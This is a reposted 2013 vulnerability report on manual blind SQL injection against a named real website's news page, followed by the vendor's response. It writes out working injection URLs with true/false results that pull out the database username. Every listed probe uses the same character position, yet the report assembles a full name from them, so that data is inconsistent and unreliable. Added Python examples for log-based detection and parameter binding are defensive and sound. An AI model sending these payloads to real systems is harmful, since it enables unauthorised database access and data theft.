[Repost] Manual blind injection

Disclosure status:

2013-01-17: Details reported to the vendor, awaiting vendor action
2013-01-18: Vendor confirmed; details disclosed to the vendor only
2013-01-28: Details disclosed to core white hats and relevant domain experts
2013-02-07: Details disclosed to regular white hats
2013-02-17: Details disclosed to intern white hats
2013-03-03: Details disclosed to the public

Brief description:

Blind SQL injection on the main site. Today it's a manual blind injection; brothers, come learn manual blind injection too. Damn, manual testing is really slow.

Detailed description:

1. Test whether the backend is MySQL

[screenshot 0x0.jpg]

[screenshot 0x1.jpg]

2. Test how many tables there are

[screenshot a.jpg]

[screenshot b.jpg]

448 tables

3. Query the length of the current user

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select length(user()))=12 returns the normal page

Length: 12 characters

4. Dump the current user

[screenshot c0.jpg]

[screenshot c1.jpg]

[screenshot c2.jpg]

[screenshot c3.jpg]

Then keep adding 1 to the position that SUBSTR extracts, determine the ASCII code of every character, and finally convert the ASCII codes back into a string.



Below are all the test results (each pair of requests brackets one character's ASCII code):

1.
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>99 true
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>100 false
ASCII code 100, character d

2.
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>100 true
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>101 false
ASCII code 101, character e

3.
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>117 true
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>118 false
ASCII code 118, character y

4.
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>63 true
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>64 false
ASCII code 64, character @

5.
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>48 true
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>49 false
ASCII code 49, character 1

6.
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>47 true
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>48 false
ASCII code 48, character 0

7.
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>45 true
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>46 false
ASCII code 46, character .

8.
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>47 true
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>48 false
ASCII code 48, character 0

9.
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>45 true
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>46 false
ASCII code 46, character .

10.
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>49 true
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>50 false
ASCII code 50, character 2

11.
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>45 true
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>46 false
ASCII code 46, character .

12.
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>51 true
http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>52 false
ASCII code 52, character 4





Putting it together, the current MySQL user is: dey@10.0.2.4





Dumping databases and tables works on the same principle: first determine the field's length, then take each character in turn and convert it to its ASCII code, compare that code against a value, and finally convert the ASCII code back to get the character.
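What a defender can do with the probe trail above: the same requests that leak one character at a time are unmistakable in a web server's access log. The Python script below is an added example, not part of the original report and not from any tool the report names. It parses a small constructed set of access-log lines (the SUBSTR position advances 1, 2, 3 as the write-up describes, and the thresholds for the letter y are 120/121 because chr(121) is 'y'), flags requests that carry an injected sub-select after a boolean operator, and reconstructs what the attacker learned by treating a probe whose response size equals the un-injected baseline as "true". That reconstruction is how an incident responder scopes what was actually extracted. Log format, IP addresses and response sizes are all assumptions of the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log sample (not taken from the original report): one clean
# request, a length probe, six character probes for positions 1..3, one unrelated hit.
SAMPLE_LOG = """\
10.1.1.9 - - [17/Jan/2013:10:00:01 +0800] "GET /news_detail.jsp?newsid=601 HTTP/1.1" 200 5120
10.1.1.9 - - [17/Jan/2013:10:00:02 +0800] "GET /news_detail.jsp?newsid=601%20And%20(select%20length(user()))=12 HTTP/1.1" 200 5120
10.1.1.9 - - [17/Jan/2013:10:00:03 +0800] "GET /news_detail.jsp?newsid=601%20And%20(select%20ASCII(SUBSTR(user(),1,1)))>99 HTTP/1.1" 200 5120
10.1.1.9 - - [17/Jan/2013:10:00:04 +0800] "GET /news_detail.jsp?newsid=601%20And%20(select%20ASCII(SUBSTR(user(),1,1)))>100 HTTP/1.1" 200 4710
10.1.1.9 - - [17/Jan/2013:10:00:05 +0800] "GET /news_detail.jsp?newsid=601%20And%20(select%20ASCII(SUBSTR(user(),2,1)))>100 HTTP/1.1" 200 5120
10.1.1.9 - - [17/Jan/2013:10:00:06 +0800] "GET /news_detail.jsp?newsid=601%20And%20(select%20ASCII(SUBSTR(user(),2,1)))>101 HTTP/1.1" 200 4710
10.1.1.9 - - [17/Jan/2013:10:00:07 +0800] "GET /news_detail.jsp?newsid=601%20And%20(select%20ASCII(SUBSTR(user(),3,1)))>120 HTTP/1.1" 200 5120
10.1.1.9 - - [17/Jan/2013:10:00:08 +0800] "GET /news_detail.jsp?newsid=601%20And%20(select%20ASCII(SUBSTR(user(),3,1)))>121 HTTP/1.1" 200 4710
10.1.1.10 - - [17/Jan/2013:10:00:09 +0800] "GET /news_detail.jsp?newsid=602 HTTP/1.1" 200 4980
"""

# Combined-log-style line: client, timestamp, request line, status, response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)
# Any sub-select glued onto the WHERE clause with a boolean operator: the generic signature.
GENERIC_RE = re.compile(r'\b(?:and|or)\b\s*\(?\s*select\b', re.IGNORECASE)
# The exact probe shape from the write-up: ... And (select ASCII(SUBSTR(<expr>,<pos>,1)))><threshold>
PROBE_RE = re.compile(
    r'\b(?:and|or)\b\s*\(?\s*select\s+ascii\s*\(\s*substr(?:ing)?\s*\(\s*'
    r'(?P<expr>[^,]+?)\s*,\s*(?P<pos>\d+)\s*,\s*1\s*\)\s*\)\s*\)?\s*>\s*(?P<thr>\d+)',
    re.IGNORECASE,
)


def parse_log(text):
    """Turn raw log lines into dicts with the query string already URL-decoded."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = unquote_plus(m.group("target")).partition("?")
        events.append({"ip": m.group("ip"), "path": path, "query": query,
                       "status": int(m.group("status")), "size": int(m.group("size"))})
    return events


def flag_sqli(events):
    """Detection: every request whose decoded query carries an injected sub-select."""
    return [e for e in events if GENERIC_RE.search(e["query"])]


def reconstruct(events):
    """Impact scoping: rebuild the characters the probes revealed, per probed expression.

    A probe whose response size equals the un-injected request for the same id is
    taken as the "true" page; the character is the smallest threshold that came back
    false when it is exactly one above the largest threshold that came back true.
    """
    baseline = {}
    for e in events:
        m = re.match(r'(\w+)=(\d+)$', e["query"])  # clean request, e.g. newsid=601
        if m and e["status"] == 200:
            baseline[(e["path"], m.group(1), m.group(2))] = e["size"]
    truth = defaultdict(lambda: {"true": set(), "false": set()})
    for e in events:
        pm = PROBE_RE.search(e["query"])
        bm = re.match(r'(\w+)=(\d+)', e["query"])
        if not pm or not bm:
            continue
        base = baseline.get((e["path"], bm.group(1), bm.group(2)))
        if base is None:
            continue
        key = (pm.group("expr").lower(), int(pm.group("pos")))
        truth[key]["true" if e["size"] == base else "false"].add(int(pm.group("thr")))
    chars = defaultdict(dict)
    for (expr, pos), t in truth.items():
        if t["true"] and t["false"] and min(t["false"]) == max(t["true"]) + 1:
            chars[expr][pos] = chr(min(t["false"]))
        else:
            chars[expr][pos] = "?"  # inconsistent or incomplete bracket
    return {expr: "".join(c for _, c in sorted(by_pos.items())) for expr, by_pos in chars.items()}


if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    hits = flag_sqli(events)
    print(f"{len(hits)} injection probes from {sorted({h['ip'] for h in hits})}")
    for expr, value in reconstruct(events).items():
        print(f"attacker inferred {expr} begins with {value!r}")
```

The generic regex is the one to turn into an alert; the probe-specific parser only matters after the fact, when you need to say which value was leaked and how far the attacker got. Real logs will also need the response size compared against a tolerance rather than exact equality, since dynamic pages rarely return byte-identical bodies.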



Did you follow that? This is boolean-based blind injection. If not, I suggest studying database queries.



The principle of manual injection: first you have to understand SQL syntax. Once you have learned SQL syntax, manual injection is no longer a dream.



One last note: I tested sqlmap, havij and pangolin, and none of these injection tools could inject here.







Proof of vulnerability:


Fix:

Filter key characters such as and, select

Copyright notice: when reposting, please credit the source: shack2@WooYun
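The fix the report proposes is a keyword blocklist. The durable fix is to stop building the query from the request string at all, so that no keyword can ever be parsed as SQL. The Python/sqlite3 snippet below is an added example, not the site's code and not the reporter's: it sets up a constructed news table, shows the string-concatenation pattern that produces the true/false oracle described above, and then two hardened lookups, one with parameter binding alone and one that also enforces the integer type the newsid parameter is supposed to have. The JSP application behind the report would presumably use JDBC, where PreparedStatement plays the role of the `?` placeholder used here; that is an assumption, since the page shows none of the application's code.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for a news table; not the site's real schema."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (newsid INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)",
                   [(601, "Article 601"), (602, "Article 602")])
    return db


def lookup_vulnerable(db, newsid):
    """String concatenation: everything after the number is parsed as SQL, so an
    appended condition turns the page into a true/false oracle (the bug class above)."""
    sql = "SELECT title FROM news WHERE newsid=" + newsid
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def lookup_bound(db, newsid):
    """Parameter binding alone: the value travels as data and is never parsed as SQL.
    '601 AND 1=1' is now just a string that matches no row."""
    row = db.execute("SELECT title FROM news WHERE newsid=?", (newsid,)).fetchone()
    return row[0] if row else None


def lookup_safe(db, newsid):
    """Binding plus type validation: newsid is supposed to be an integer, so anything
    that is not one is rejected before it reaches the database at all."""
    try:
        newsid_int = int(newsid)
    except (TypeError, ValueError):
        return None
    row = db.execute("SELECT title FROM news WHERE newsid=?", (newsid_int,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # The two appended conditions return different pages only through the vulnerable path.
    for payload in ("601", "601 AND 1=1", "601 AND 1=0"):
        print(f"{payload!r}: vulnerable={lookup_vulnerable(db, payload)!r} "
              f"bound={lookup_bound(db, payload)!r} safe={lookup_safe(db, payload)!r}")
```

The contrast to look for is the middle column: with concatenation, "601 AND 1=1" and "601 AND 1=0" return different pages, which is exactly the signal the write-up's probes depend on; with binding, both return nothing, and with the integer check they never reach the database. A blocklist on `and` and `select` would have to anticipate every spelling and encoding an attacker can use, whereas a bound parameter has no spelling to anticipate.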


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2013-01-18 09:40

Vendor reply:

Thanks to shack2 for the attention; this has been submitted to the technical department for handling.

Latest status:

None yet



posted on 2015-10-10 22:58 by hahahahahai12 (184 reads, 0 comments)
